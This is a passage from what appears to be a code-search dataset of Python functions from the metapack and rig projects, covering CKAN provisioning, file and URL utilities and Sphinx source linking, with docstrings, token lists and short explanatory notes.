orgs = {o['name']: o for o in c.action.organization_list(all_fields=True)}
for o in doc['Organizations']:
if o.value not in orgs:
prt('Creating organization: ', o.value)
c.action.organization_create(name=o.value,
title=o.get_value('title'),
description=o.get_value('description'),
id=o.get_value('id'),
image_url=o.get_value('image_url')) | [
"def",
"configure_ckan",
"(",
"m",
")",
":",
"from",
"ckanapi",
"import",
"RemoteCKAN",
"try",
":",
"doc",
"=",
"MetapackDoc",
"(",
"m",
".",
"mt_file",
",",
"cache",
"=",
"m",
".",
"cache",
")",
"except",
"(",
"IOError",
",",
"MetatabError",
")",
"as",
"e",
":",
"err",
"(",
"\"Failed to open metatab '{}': {}\"",
".",
"format",
"(",
"m",
".",
"mt_file",
",",
"e",
")",
")",
"c",
"=",
"RemoteCKAN",
"(",
"m",
".",
"ckan_url",
",",
"apikey",
"=",
"m",
".",
"api_key",
")",
"groups",
"=",
"{",
"g",
"[",
"'name'",
"]",
":",
"g",
"for",
"g",
"in",
"c",
".",
"action",
".",
"group_list",
"(",
"all_fields",
"=",
"True",
")",
"}",
"for",
"g",
"in",
"doc",
"[",
"'Groups'",
"]",
":",
"if",
"g",
".",
"value",
"not",
"in",
"groups",
":",
"prt",
"(",
"'Creating group: '",
",",
"g",
".",
"value",
")",
"c",
".",
"action",
".",
"group_create",
"(",
"name",
"=",
"g",
".",
"value",
",",
"title",
"=",
"g",
".",
"get_value",
"(",
"'title'",
")",
",",
"description",
"=",
"g",
".",
"get_value",
"(",
"'description'",
")",
",",
"id",
"=",
"g",
".",
"get_value",
"(",
"'id'",
")",
",",
"image_url",
"=",
"g",
".",
"get_value",
"(",
"'image_url'",
")",
")",
"orgs",
"=",
"{",
"o",
"[",
"'name'",
"]",
":",
"o",
"for",
"o",
"in",
"c",
".",
"action",
".",
"organization_list",
"(",
"all_fields",
"=",
"True",
")",
"}",
"for",
"o",
"in",
"doc",
"[",
"'Organizations'",
"]",
":",
"if",
"o",
".",
"value",
"not",
"in",
"orgs",
":",
"prt",
"(",
"'Creating organization: '",
",",
"o",
".",
"value",
")",
"c",
".",
"action",
".",
"organization_create",
"(",
"name",
"=",
"o",
".",
"value",
",",
"title",
"=",
"o",
".",
"get_value",
"(",
"'title'",
")",
",",
"description",
"=",
"o",
".",
"get_value",
"(",
"'description'",
")",
",",
"id",
"=",
"o",
".",
"get_value",
"(",
"'id'",
")",
",",
"image_url",
"=",
"o",
".",
"get_value",
"(",
"'image_url'",
")",
")"
] | Load groups and organizations, from a file in Metatab format | [
"Load",
"groups",
"and",
"organizations",
"from",
"a",
"file",
"in",
"Metatab",
"format"
] | train | https://github.com/Metatab/metapack/blob/8365f221fbeaa3c0be9091f2eaf3447fd8e2e8d6/metapack/cli/metakan.py#L353-L386 |
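configure_ckan is idempotent provisioning: list what the CKAN instance already has, then create only what is missing. A minimal sketch of the same round-trip with ckanapi; the server URL, API key, and group names below are placeholders, while group_list and group_create are the standard CKAN actions used above:

from ckanapi import RemoteCKAN

c = RemoteCKAN('https://ckan.example.org', apikey='xxxx')  # placeholders

existing = {g['name'] for g in c.action.group_list(all_fields=True)}
for name in ('demographics', 'transport'):   # hypothetical group names
    if name not in existing:
        c.action.group_create(name=name, title=name.title())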
Metatab/metapack | metapack/cli/metakan.py | package_load_instructions | def package_load_instructions(inst_distributions):
"""Load instructions, displayed in the package notes"""
per_package_inst = ''
for dist in inst_distributions:
if dist.type == 'zip':
per_package_inst += dedent(
"""
# Loading the ZIP Package
Zip packages are compressed, so large resources may load faster.
import metapack as mp
pkg = mp.open_package('{url}')
""".format(url=dist.package_url.inner))
elif dist.type == 'csv':
per_package_inst += dedent(
"""
# Loading the CSV Package
CSV packages load resources individually, so small resources may load faster.
import metapack as mp
pkg = mp.open_package('{url}')
""".format(url=dist.package_url.inner))
if per_package_inst:
return '\n---\n'+per_package_inst
else:
return '' | python | def package_load_instructions(inst_distributions):
"""Load instructions, displayed in the package notes"""
per_package_inst = ''
for dist in inst_distributions:
if dist.type == 'zip':
per_package_inst += dedent(
"""
# Loading the ZIP Package
Zip packages are compressed, so large resources may load faster.
import metapack as mp
pkg = mp.open_package('{url}')
""".format(url=dist.package_url.inner))
elif dist.type == 'csv':
per_package_inst += dedent(
"""
# Loading the CSV Package
CSV packages load resources individually, so small resources may load faster.
import metapack as mp
pkg = mp.open_package('{url}')
""".format(url=dist.package_url.inner))
if per_package_inst:
return '\n---\n'+per_package_inst
else:
return '' | [
"def",
"package_load_instructions",
"(",
"inst_distributions",
")",
":",
"per_package_inst",
"=",
"''",
"for",
"dist",
"in",
"inst_distributions",
":",
"if",
"dist",
".",
"type",
"==",
"'zip'",
":",
"per_package_inst",
"+=",
"dedent",
"(",
"\"\"\"\n # Loading the ZIP Package\n \n Zip packages are compressed, so large resources may load faster.\n \n import metapack as mp\n pkg = mp.open_package('{url}')\n \n \"\"\"",
".",
"format",
"(",
"url",
"=",
"dist",
".",
"package_url",
".",
"inner",
")",
")",
"elif",
"dist",
".",
"type",
"==",
"'csv'",
":",
"per_package_inst",
"+=",
"dedent",
"(",
"\"\"\"\n # Loading the CSV Package\n \n CSV packages load resources individually, so small resources may load faster. \n \n \n import metapack as mp\n pkg = mp.open_package('{url}')\n \n \"\"\"",
".",
"format",
"(",
"url",
"=",
"dist",
".",
"package_url",
".",
"inner",
")",
")",
"if",
"per_package_inst",
":",
"return",
"'\\n---\\n'",
"+",
"per_package_inst",
"else",
":",
"return",
"''"
] | Load instructions, displayed in the package notes | [
"Load",
"instructions",
"displayed",
"in",
"the",
"package",
"notes"
] | train | https://github.com/Metatab/metapack/blob/8365f221fbeaa3c0be9091f2eaf3447fd8e2e8d6/metapack/cli/metakan.py#L403-L440 |
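package_load_instructions builds its notes by concatenating textwrap.dedent blocks, one per distribution type, and prefixes a separator only when something was generated. A runnable sketch with a stand-in distribution object (SimpleNamespace replaces metapack's distribution class, and the URL is made up):

from textwrap import dedent
from types import SimpleNamespace

def load_instructions(dists):
    out = ''
    for dist in dists:
        if dist.type == 'csv':
            out += dedent("""
                # Loading the CSV Package
                import metapack as mp
                pkg = mp.open_package('{url}')
            """.format(url=dist.url))
    return '\n---\n' + out if out else ''

dists = [SimpleNamespace(type='csv', url='http://example.com/pkg.csv')]
print(load_instructions(dists))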
Metatab/metapack | metapack/cli/metakan.py | dump_ckan | def dump_ckan(m):
"""Create a groups and organization file"""
doc = MetapackDoc(cache=m.cache)
doc.new_section('Groups', 'Title Description Id Image_url'.split())
doc.new_section('Organizations', 'Title Description Id Image_url'.split())
c = RemoteCKAN(m.ckan_url, apikey=m.api_key)
for g in c.action.group_list(all_fields=True):
print(g.keys())
for o in c.action.organization_list(all_fields=True):
print(o.keys()) | python | def dump_ckan(m):
"""Create a groups and organization file"""
doc = MetapackDoc(cache=m.cache)
doc.new_section('Groups', 'Title Description Id Image_url'.split())
doc.new_section('Organizations', 'Title Description Id Image_url'.split())
c = RemoteCKAN(m.ckan_url, apikey=m.api_key)
for g in c.action.group_list(all_fields=True):
print(g.keys())
for o in c.action.organization_list(all_fields=True):
print(o.keys()) | [
"def",
"dump_ckan",
"(",
"m",
")",
":",
"doc",
"=",
"MetapackDoc",
"(",
"cache",
"=",
"m",
".",
"cache",
")",
"doc",
".",
"new_section",
"(",
"'Groups'",
",",
"'Title Description Id Image_url'",
".",
"split",
"(",
")",
")",
"doc",
".",
"new_section",
"(",
"'Organizations'",
",",
"'Title Description Id Image_url'",
".",
"split",
"(",
")",
")",
"c",
"=",
"RemoteCKAN",
"(",
"m",
".",
"ckan_url",
",",
"apikey",
"=",
"m",
".",
"api_key",
")",
"for",
"g",
"in",
"c",
".",
"action",
".",
"group_list",
"(",
"all_fields",
"=",
"True",
")",
":",
"print",
"(",
"g",
".",
"keys",
"(",
")",
")",
"for",
"o",
"in",
"c",
".",
"action",
".",
"organization_list",
"(",
"all_fields",
"=",
"True",
")",
":",
"print",
"(",
"g",
".",
"keys",
"(",
")",
")"
] | Create a groups and organization file | [
"Create",
"a",
"groups",
"and",
"organization",
"file"
] | train | https://github.com/Metatab/metapack/blob/8365f221fbeaa3c0be9091f2eaf3447fd8e2e8d6/metapack/cli/metakan.py#L442-L455 |
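dump_ckan is a stub that only inspects what CKAN returns; the organization loop printed g.keys() rather than o.keys(), which is corrected above. The inspection itself is a useful one-off, sketched here with placeholder credentials:

from ckanapi import RemoteCKAN

c = RemoteCKAN('https://ckan.example.org', apikey='xxxx')  # placeholders

for org in c.action.organization_list(all_fields=True):
    print(sorted(org.keys()))  # discover which fields CKAN exposes
    break                      # one sample record is enough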
Metatab/metapack | metapack/cli/metakan.py | MetapackCliMemo.update_mt_arg | def update_mt_arg(self, metatabfile):
"""Return a new memo with a new metatabfile argument"""
o = MetapackCliMemo(self.args)
o.set_mt_arg(metatabfile)
return o | python | def update_mt_arg(self, metatabfile):
"""Return a new memo with a new metatabfile argument"""
o = MetapackCliMemo(self.args)
o.set_mt_arg(metatabfile)
return o | [
"def",
"update_mt_arg",
"(",
"self",
",",
"metatabfile",
")",
":",
"o",
"=",
"MetapackCliMemo",
"(",
"self",
".",
"args",
")",
"o",
".",
"set_mt_arg",
"(",
"metatabfile",
")",
"return",
"o"
] | Return a new memo with a new metatabfile argument | [
"Return",
"a",
"new",
"memo",
"with",
"a",
"new",
"metatabfile",
"argument"
] | train | https://github.com/Metatab/metapack/blob/8365f221fbeaa3c0be9091f2eaf3447fd8e2e8d6/metapack/cli/metakan.py#L45-L49 |
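update_mt_arg is the copy-with-one-change idiom: rebuild the memo from the same CLI args, then repoint it at a different metatab file. With dataclasses the same idea is a one-liner via replace(); this is a generic sketch, not the MetapackCliMemo class:

from dataclasses import dataclass, replace

@dataclass(frozen=True)
class Memo:
    args: tuple
    mt_file: str

m = Memo(args=('-v',), mt_file='metadata.csv')
m2 = replace(m, mt_file='other.csv')   # new memo, original untouched
print(m.mt_file, m2.mt_file)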
project-rig/rig | docs/source/conf.py | linkcode_resolve | def linkcode_resolve(domain, info):
"""Determine the URL corresponding to Python object on GitHub
This code is derived from the version used by `Numpy
<https://github.com/numpy/numpy/blob/v1.9.2/doc/source/conf.py#L286>`_.
"""
# Only link to Python source
if domain != 'py':
return None
# Get a reference to the object in question
modname = info['module']
fullname = info['fullname']
submod = sys.modules.get(modname)
if submod is None:
return None
obj = submod
for part in fullname.split('.'):
try:
obj = getattr(obj, part)
except:
return None
# Find the file which contains the object
try:
file_name = inspect.getsourcefile(obj)
except:
file_name = None
if not file_name:
return None
# Convert the filename into a path relative to the rig module top-level
file_name = os.path.relpath(file_name, start=os.path.dirname(local_module_path))
# Get the line number range that object lives on
try:
source, lineno = inspect.getsourcelines(obj)
except:
lineno = None
if lineno:
linespec = "#L{}-L{}".format(lineno,
lineno + len(source) - 1)
else:
linespec = ""
# Generate a link to the code in the official GitHub repository with the
# current-version's tag.
return ("https://github.com/{repo}/blob/v{version}/"
"{module_path}{file_name}{linespec}".format(repo=github_repo,
version=version,
module_path=github_module_path,
file_name=file_name,
linespec=linespec)) | python | def linkcode_resolve(domain, info):
"""Determine the URL corresponding to Python object on GitHub
This code is derived from the version used by `Numpy
<https://github.com/numpy/numpy/blob/v1.9.2/doc/source/conf.py#L286>`_.
"""
# Only link to Python source
if domain != 'py':
return None
# Get a reference to the object in question
modname = info['module']
fullname = info['fullname']
submod = sys.modules.get(modname)
if submod is None:
return None
obj = submod
for part in fullname.split('.'):
try:
obj = getattr(obj, part)
except:
return None
# Find the file which contains the object
try:
file_name = inspect.getsourcefile(obj)
except:
file_name = None
if not file_name:
return None
# Convert the filename into a path relative to the rig module top-level
file_name = os.path.relpath(file_name, start=os.path.dirname(local_module_path))
# Get the line number range that object lives on
try:
source, lineno = inspect.getsourcelines(obj)
except:
lineno = None
if lineno:
linespec = "#L{}-L{}".format(lineno,
lineno + len(source) - 1)
else:
linespec = ""
# Generate a link to the code in the official GitHub repository with the
# current-version's tag.
return ("https://github.com/{repo}/blob/v{version}/"
"{module_path}{file_name}{linespec}".format(repo=github_repo,
version=version,
module_path=github_module_path,
file_name=file_name,
linespec=linespec)) | [
"def",
"linkcode_resolve",
"(",
"domain",
",",
"info",
")",
":",
"# Only link to Python source",
"if",
"domain",
"!=",
"'py'",
":",
"return",
"None",
"# Get a reference to the object in question",
"modname",
"=",
"info",
"[",
"'module'",
"]",
"fullname",
"=",
"info",
"[",
"'fullname'",
"]",
"submod",
"=",
"sys",
".",
"modules",
".",
"get",
"(",
"modname",
")",
"if",
"submod",
"is",
"None",
":",
"return",
"None",
"obj",
"=",
"submod",
"for",
"part",
"in",
"fullname",
".",
"split",
"(",
"'.'",
")",
":",
"try",
":",
"obj",
"=",
"getattr",
"(",
"obj",
",",
"part",
")",
"except",
":",
"return",
"None",
"# Find the file which contains the object",
"try",
":",
"file_name",
"=",
"inspect",
".",
"getsourcefile",
"(",
"obj",
")",
"except",
":",
"file_name",
"=",
"None",
"if",
"not",
"file_name",
":",
"return",
"None",
"# Convert the filename into a path relative to the rig module top-level",
"file_name",
"=",
"os",
".",
"path",
".",
"relpath",
"(",
"file_name",
",",
"start",
"=",
"os",
".",
"path",
".",
"dirname",
"(",
"local_module_path",
")",
")",
"# Get the line number range that object lives on",
"try",
":",
"source",
",",
"lineno",
"=",
"inspect",
".",
"getsourcelines",
"(",
"obj",
")",
"except",
":",
"lineno",
"=",
"None",
"if",
"lineno",
":",
"linespec",
"=",
"\"#L{}-L{}\"",
".",
"format",
"(",
"lineno",
",",
"lineno",
"+",
"len",
"(",
"source",
")",
"-",
"1",
")",
"else",
":",
"linespec",
"=",
"\"\"",
"# Generate a link to the code in the official GitHub repository with the",
"# current-version's tag.",
"return",
"(",
"\"https://github.com/{repo}/blob/v{version}/\"",
"\"{module_path}{file_name}{linespec}\"",
".",
"format",
"(",
"repo",
"=",
"github_repo",
",",
"version",
"=",
"version",
",",
"module_path",
"=",
"github_module_path",
",",
"file_name",
"=",
"file_name",
",",
"linespec",
"=",
"linespec",
")",
")"
] | Determine the URL corresponding to Python object on GitHub
This code is derived from the version used by `Numpy
<https://github.com/numpy/numpy/blob/v1.9.2/doc/source/conf.py#L286>`_. | [
"Determine",
"the",
"URL",
"corresponding",
"to",
"Python",
"object",
"on",
"GitHub",
"This",
"code",
"is",
"derived",
"from",
"the",
"version",
"used",
"by",
"Numpy",
"<https",
":",
"//",
"github",
".",
"com",
"/",
"numpy",
"/",
"numpy",
"/",
"blob",
"/",
"v1",
".",
"9",
".",
"2",
"/",
"doc",
"/",
"source",
"/",
"conf",
".",
"py#L286",
">",
"_",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/docs/source/conf.py#L144-L198 |
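The core of linkcode_resolve is turning a live Python object into a GitHub #Lstart-Lend anchor via inspect. A self-contained demonstration against a stdlib function (textwrap.dedent is just a convenient target, and the repository/branch parts of the URL are placeholders):

import inspect
import os
import textwrap

obj = textwrap.dedent  # any pure-Python object with retrievable source
file_name = os.path.basename(inspect.getsourcefile(obj))
source, lineno = inspect.getsourcelines(obj)
linespec = "#L{}-L{}".format(lineno, lineno + len(source) - 1)
print("https://github.com/python/cpython/blob/main/Lib/" + file_name + linespec)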
Metatab/metapack | metapack/util.py | declaration_path | def declaration_path(name):
"""Return the path to an included declaration"""
from os.path import dirname, join, exists
import metatab.declarations
from metatab.exc import IncludeError
d = dirname(metatab.declarations.__file__)
path = join(d, name)
if not exists(path):
path = join(d, name + '.csv')
if not exists(path):
raise IncludeError("No local declaration file for name '{}' ".format(name))
return path | python | def declaration_path(name):
"""Return the path to an included declaration"""
from os.path import dirname, join, exists
import metatab.declarations
from metatab.exc import IncludeError
d = dirname(metatab.declarations.__file__)
path = join(d, name)
if not exists(path):
path = join(d, name + '.csv')
if not exists(path):
raise IncludeError("No local declaration file for name '{}' ".format(name))
return path | [
"def",
"declaration_path",
"(",
"name",
")",
":",
"from",
"os",
".",
"path",
"import",
"dirname",
",",
"join",
",",
"exists",
"import",
"metatab",
".",
"declarations",
"from",
"metatab",
".",
"exc",
"import",
"IncludeError",
"d",
"=",
"dirname",
"(",
"metatab",
".",
"declarations",
".",
"__file__",
")",
"path",
"=",
"join",
"(",
"d",
",",
"name",
")",
"if",
"not",
"exists",
"(",
"path",
")",
":",
"path",
"=",
"join",
"(",
"d",
",",
"name",
"+",
"'.csv'",
")",
"if",
"not",
"exists",
"(",
"path",
")",
":",
"raise",
"IncludeError",
"(",
"\"No local declaration file for name '{}' \"",
".",
"format",
"(",
"name",
")",
")",
"return",
"path"
] | Return the path to an included declaration | [
"Return",
"the",
"path",
"to",
"an",
"included",
"declaration"
] | train | https://github.com/Metatab/metapack/blob/8365f221fbeaa3c0be9091f2eaf3447fd8e2e8d6/metapack/util.py#L16-L32 |
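declaration_path is "find a data file shipped next to a module, trying the bare name and then name.csv". The same lookup written generically, with the stdlib email package standing in for metatab.declarations so the sketch runs anywhere:

import email  # stand-in for a package that ships data files
from os.path import dirname, exists, join

def bundled_path(package, name, suffix='.csv'):
    d = dirname(package.__file__)
    for candidate in (join(d, name), join(d, name + suffix)):
        if exists(candidate):
            return candidate
    raise FileNotFoundError("no bundled file for {!r}".format(name))

print(bundled_path(email, 'parser', suffix='.py'))  # .../email/parser.py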
Metatab/metapack | metapack/util.py | flatten | def flatten(d, sep='.'):
"""Flatten a data structure into tuples"""
def _flatten(e, parent_key='', sep='.'):
import collections
prefix = parent_key + sep if parent_key else ''
if isinstance(e, collections.MutableMapping):
return tuple((prefix + k2, v2) for k, v in e.items() for k2, v2 in _flatten(v, k, sep))
elif isinstance(e, collections.MutableSequence):
return tuple((prefix + k2, v2) for i, v in enumerate(e) for k2, v2 in _flatten(v, str(i), sep))
else:
return (parent_key, (e,)),
return tuple((k, v[0]) for k, v in _flatten(d, '', sep)) | python | def flatten(d, sep='.'):
"""Flatten a data structure into tuples"""
def _flatten(e, parent_key='', sep='.'):
import collections
prefix = parent_key + sep if parent_key else ''
if isinstance(e, collections.MutableMapping):
return tuple((prefix + k2, v2) for k, v in e.items() for k2, v2 in _flatten(v, k, sep))
elif isinstance(e, collections.MutableSequence):
return tuple((prefix + k2, v2) for i, v in enumerate(e) for k2, v2 in _flatten(v, str(i), sep))
else:
return (parent_key, (e,)),
return tuple((k, v[0]) for k, v in _flatten(d, '', sep)) | [
"def",
"flatten",
"(",
"d",
",",
"sep",
"=",
"'.'",
")",
":",
"def",
"_flatten",
"(",
"e",
",",
"parent_key",
"=",
"''",
",",
"sep",
"=",
"'.'",
")",
":",
"import",
"collections",
"prefix",
"=",
"parent_key",
"+",
"sep",
"if",
"parent_key",
"else",
"''",
"if",
"isinstance",
"(",
"e",
",",
"collections",
".",
"MutableMapping",
")",
":",
"return",
"tuple",
"(",
"(",
"prefix",
"+",
"k2",
",",
"v2",
")",
"for",
"k",
",",
"v",
"in",
"e",
".",
"items",
"(",
")",
"for",
"k2",
",",
"v2",
"in",
"_flatten",
"(",
"v",
",",
"k",
",",
"sep",
")",
")",
"elif",
"isinstance",
"(",
"e",
",",
"collections",
".",
"MutableSequence",
")",
":",
"return",
"tuple",
"(",
"(",
"prefix",
"+",
"k2",
",",
"v2",
")",
"for",
"i",
",",
"v",
"in",
"enumerate",
"(",
"e",
")",
"for",
"k2",
",",
"v2",
"in",
"_flatten",
"(",
"v",
",",
"str",
"(",
"i",
")",
",",
"sep",
")",
")",
"else",
":",
"return",
"(",
"parent_key",
",",
"(",
"e",
",",
")",
")",
",",
"return",
"tuple",
"(",
"(",
"k",
",",
"v",
"[",
"0",
"]",
")",
"for",
"k",
",",
"v",
"in",
"_flatten",
"(",
"d",
",",
"''",
",",
"sep",
")",
")"
] | Flatten a data structure into tuples | [
"Flatten",
"a",
"data",
"structure",
"into",
"tuples"
] | train | https://github.com/Metatab/metapack/blob/8365f221fbeaa3c0be9091f2eaf3447fd8e2e8d6/metapack/util.py#L59-L74 |
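One portability note on flatten: the abstract base classes it tests against moved to collections.abc, and the old collections aliases were removed in Python 3.10, so the function as written fails on current interpreters. A working sketch of the same recursion with modern imports:

from collections.abc import MutableMapping, MutableSequence

def flatten(d, sep='.'):
    def _flatten(e, parent_key=''):
        prefix = parent_key + sep if parent_key else ''
        if isinstance(e, MutableMapping):
            return tuple((prefix + k2, v2)
                         for k, v in e.items()
                         for k2, v2 in _flatten(v, k))
        elif isinstance(e, MutableSequence):
            return tuple((prefix + k2, v2)
                         for i, v in enumerate(e)
                         for k2, v2 in _flatten(v, str(i)))
        else:
            return ((parent_key, (e,)),)
    return tuple((k, v[0]) for k, v in _flatten(d))

print(flatten({'a': {'b': 1, 'c': [2, 3]}}))
# (('a.b', 1), ('a.c.0', 2), ('a.c.1', 3))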
Metatab/metapack | metapack/util.py | make_dir_structure | def make_dir_structure(base_dir):
"""Make the build directory structure. """
def maybe_makedir(*args):
p = join(base_dir, *args)
if exists(p) and not isdir(p):
raise IOError("File '{}' exists but is not a directory ".format(p))
if not exists(p):
makedirs(p)
maybe_makedir(DOWNLOAD_DIR)
maybe_makedir(PACKAGE_DIR)
maybe_makedir(OLD_DIR) | python | def make_dir_structure(base_dir):
"""Make the build directory structure. """
def maybe_makedir(*args):
p = join(base_dir, *args)
if exists(p) and not isdir(p):
raise IOError("File '{}' exists but is not a directory ".format(p))
if not exists(p):
makedirs(p)
maybe_makedir(DOWNLOAD_DIR)
maybe_makedir(PACKAGE_DIR)
maybe_makedir(OLD_DIR) | [
"def",
"make_dir_structure",
"(",
"base_dir",
")",
":",
"def",
"maybe_makedir",
"(",
"*",
"args",
")",
":",
"p",
"=",
"join",
"(",
"base_dir",
",",
"*",
"args",
")",
"if",
"exists",
"(",
"p",
")",
"and",
"not",
"isdir",
"(",
"p",
")",
":",
"raise",
"IOError",
"(",
"\"File '{}' exists but is not a directory \"",
".",
"format",
"(",
"p",
")",
")",
"if",
"not",
"exists",
"(",
"p",
")",
":",
"makedirs",
"(",
"p",
")",
"maybe_makedir",
"(",
"DOWNLOAD_DIR",
")",
"maybe_makedir",
"(",
"PACKAGE_DIR",
")",
"maybe_makedir",
"(",
"OLD_DIR",
")"
] | Make the build directory structure. | [
"Make",
"the",
"build",
"directory",
"structure",
"."
] | train | https://github.com/Metatab/metapack/blob/8365f221fbeaa3c0be9091f2eaf3447fd8e2e8d6/metapack/util.py#L89-L104 |
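make_dir_structure predates os.makedirs(exist_ok=True); on Python 3 the "create if missing, complain if a file is in the way" check collapses to a few lines. A runnable sketch with placeholder directory names standing in for DOWNLOAD_DIR and friends:

import os, tempfile

base = tempfile.mkdtemp()
for sub in ('downloads', 'packages', 'old'):  # stand-ins for the constants
    p = os.path.join(base, sub)
    if os.path.exists(p) and not os.path.isdir(p):
        raise IOError("File '{}' exists but is not a directory".format(p))
    os.makedirs(p, exist_ok=True)
print(sorted(os.listdir(base)))  # ['downloads', 'old', 'packages']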
Metatab/metapack | metapack/util.py | guess_format | def guess_format(url):
"""Try to guess the format of a resource, possibly with a HEAD request"""
import requests
from requests.exceptions import InvalidSchema
from rowgenerators import parse_url_to_dict
parts = parse_url_to_dict(url)
# Guess_type fails for root urls like 'http://civicknowledge.com'
if parts.get('path'):
type, encoding = mimetypes.guess_type(url)
elif parts['scheme'] in ('http', 'https'):
type, encoding = 'text/html', None # Assume it is a root url
else:
type, encoding = None, None
if type is None:
try:
r = requests.head(url, allow_redirects=False)
type = r.headers['Content-Type']
if ';' in type:
type, encoding = [e.strip() for e in type.split(';')]
except InvalidSchema:
pass # It's probably FTP
return type, mime_map.get(type) | python | def guess_format(url):
"""Try to guess the format of a resource, possibly with a HEAD request"""
import requests
from requests.exceptions import InvalidSchema
from rowgenerators import parse_url_to_dict
parts = parse_url_to_dict(url)
# Guess_type fails for root urls like 'http://civicknowledge.com'
if parts.get('path'):
type, encoding = mimetypes.guess_type(url)
elif parts['scheme'] in ('http', 'https'):
type, encoding = 'text/html', None # Assume it is a root url
else:
type, encoding = None, None
if type is None:
try:
r = requests.head(url, allow_redirects=False)
type = r.headers['Content-Type']
if ';' in type:
type, encoding = [e.strip() for e in type.split(';')]
except InvalidSchema:
pass # It's probably FTP
return type, mime_map.get(type) | [
"def",
"guess_format",
"(",
"url",
")",
":",
"import",
"requests",
"from",
"requests",
".",
"exceptions",
"import",
"InvalidSchema",
"from",
"rowgenerators",
"import",
"parse_url_to_dict",
"parts",
"=",
"parse_url_to_dict",
"(",
"url",
")",
"# Guess_type fails for root urls like 'http://civicknowledge.com'",
"if",
"parts",
".",
"get",
"(",
"'path'",
")",
":",
"type",
",",
"encoding",
"=",
"mimetypes",
".",
"guess_type",
"(",
"url",
")",
"elif",
"parts",
"[",
"'scheme'",
"]",
"in",
"(",
"'http'",
",",
"'https'",
")",
":",
"type",
",",
"encoding",
"=",
"'text/html'",
",",
"None",
"# Assume it is a root url",
"else",
":",
"type",
",",
"encoding",
"=",
"None",
",",
"None",
"if",
"type",
"is",
"None",
":",
"try",
":",
"r",
"=",
"requests",
".",
"head",
"(",
"url",
",",
"allow_redirects",
"=",
"False",
")",
"type",
"=",
"r",
".",
"headers",
"[",
"'Content-Type'",
"]",
"if",
"';'",
"in",
"type",
":",
"type",
",",
"encoding",
"=",
"[",
"e",
".",
"strip",
"(",
")",
"for",
"e",
"in",
"type",
".",
"split",
"(",
"';'",
")",
"]",
"except",
"InvalidSchema",
":",
"pass",
"# It's probably FTP",
"return",
"type",
",",
"mime_map",
".",
"get",
"(",
"type",
")"
] | Try to guess the format of a resource, possibly with a HEAD request | [
"Try",
"to",
"guess",
"the",
"format",
"of",
"a",
"resource",
"possibly",
"with",
"a",
"HEAD",
"request"
] | train | https://github.com/Metatab/metapack/blob/8365f221fbeaa3c0be9091f2eaf3447fd8e2e8d6/metapack/util.py#L202-L229 |
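guess_format is two-stage detection: guess from the file extension first, and only fall back to a network HEAD request when that is uninformative. A trimmed sketch; the mime-to-format table is a made-up stand-in for mime_map, and requests is assumed to be installed:

import mimetypes
import requests

MIME_MAP = {'text/csv': 'csv', 'application/json': 'json'}  # stand-in map

def guess_format(url):
    mime, _ = mimetypes.guess_type(url)
    if mime is None:
        # Fall back to asking the server, without following redirects.
        r = requests.head(url, allow_redirects=False)
        mime = r.headers.get('Content-Type', '').split(';')[0].strip()
    return mime, MIME_MAP.get(mime)

print(guess_format('http://example.com/data.csv'))  # ('text/csv', 'csv')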
Metatab/metapack | metapack/util.py | walk_up | def walk_up(bottom):
""" mimic os.walk, but walk 'up' instead of down the directory tree
:param bottom:
:return:
"""
import os
from os import path
bottom = path.realpath(bottom)
# get files in current dir
try:
names = os.listdir(bottom)
except Exception as e:
raise e
dirs, nondirs = [], []
for name in names:
if path.isdir(path.join(bottom, name)):
dirs.append(name)
else:
nondirs.append(name)
yield bottom, dirs, nondirs
new_path = path.realpath(path.join(bottom, '..'))
# see if we are at the top
if new_path == bottom:
return
for x in walk_up(new_path):
yield x | python | def walk_up(bottom):
""" mimic os.walk, but walk 'up' instead of down the directory tree
:param bottom:
:return:
"""
import os
from os import path
bottom = path.realpath(bottom)
# get files in current dir
try:
names = os.listdir(bottom)
except Exception as e:
raise e
dirs, nondirs = [], []
for name in names:
if path.isdir(path.join(bottom, name)):
dirs.append(name)
else:
nondirs.append(name)
yield bottom, dirs, nondirs
new_path = path.realpath(path.join(bottom, '..'))
# see if we are at the top
if new_path == bottom:
return
for x in walk_up(new_path):
yield x | [
"def",
"walk_up",
"(",
"bottom",
")",
":",
"import",
"os",
"from",
"os",
"import",
"path",
"bottom",
"=",
"path",
".",
"realpath",
"(",
"bottom",
")",
"# get files in current dir",
"try",
":",
"names",
"=",
"os",
".",
"listdir",
"(",
"bottom",
")",
"except",
"Exception",
"as",
"e",
":",
"raise",
"e",
"dirs",
",",
"nondirs",
"=",
"[",
"]",
",",
"[",
"]",
"for",
"name",
"in",
"names",
":",
"if",
"path",
".",
"isdir",
"(",
"path",
".",
"join",
"(",
"bottom",
",",
"name",
")",
")",
":",
"dirs",
".",
"append",
"(",
"name",
")",
"else",
":",
"nondirs",
".",
"append",
"(",
"name",
")",
"yield",
"bottom",
",",
"dirs",
",",
"nondirs",
"new_path",
"=",
"path",
".",
"realpath",
"(",
"path",
".",
"join",
"(",
"bottom",
",",
"'..'",
")",
")",
"# see if we are at the top",
"if",
"new_path",
"==",
"bottom",
":",
"return",
"for",
"x",
"in",
"walk_up",
"(",
"new_path",
")",
":",
"yield",
"x"
] | mimic os.walk, but walk 'up' instead of down the directory tree
:param bottom:
:return: | [
"mimic",
"os",
".",
"walk",
"but",
"walk",
"up",
"instead",
"of",
"down",
"the",
"directory",
"tree",
":",
"param",
"bottom",
":",
":",
"return",
":"
] | train | https://github.com/Metatab/metapack/blob/8365f221fbeaa3c0be9091f2eaf3447fd8e2e8d6/metapack/util.py#L254-L286 |
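A typical use of walk_up is locating a project root by marker file: the generator yields (dir, dirs, files) triples from the start point up to the filesystem root, and the caller stops at the first hit. The same search reads naturally with pathlib (an equivalent sketch; 'setup.py' is an arbitrary marker):

from pathlib import Path

def find_up(start, marker):
    p = Path(start).resolve()
    for d in (p, *p.parents):        # walk 'up' toward the root
        if (d / marker).exists():
            return d
    return None

print(find_up('.', 'setup.py'))      # directory containing the marker, or None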
Metatab/metapack | metapack/util.py | get_materialized_data_cache | def get_materialized_data_cache(doc=None):
"""Return the cache directory where data can be written during a build, usually for
a Jupyter notebook that generates many files for each execution"""
from metapack.constants import MATERIALIZED_DATA_PREFIX
from os.path import join
if not doc:
from metapack import Downloader
downloader = Downloader()
return downloader.cache.getsyspath(MATERIALIZED_DATA_PREFIX)
else:
dr = doc._cache.getsyspath(join(MATERIALIZED_DATA_PREFIX, doc.name))
ensure_dir(dr)
return dr | python | def get_materialized_data_cache(doc=None):
"""Return the cache directory where data can be written during a build, usually for
a Jupyter notebook that generates many files for each execution"""
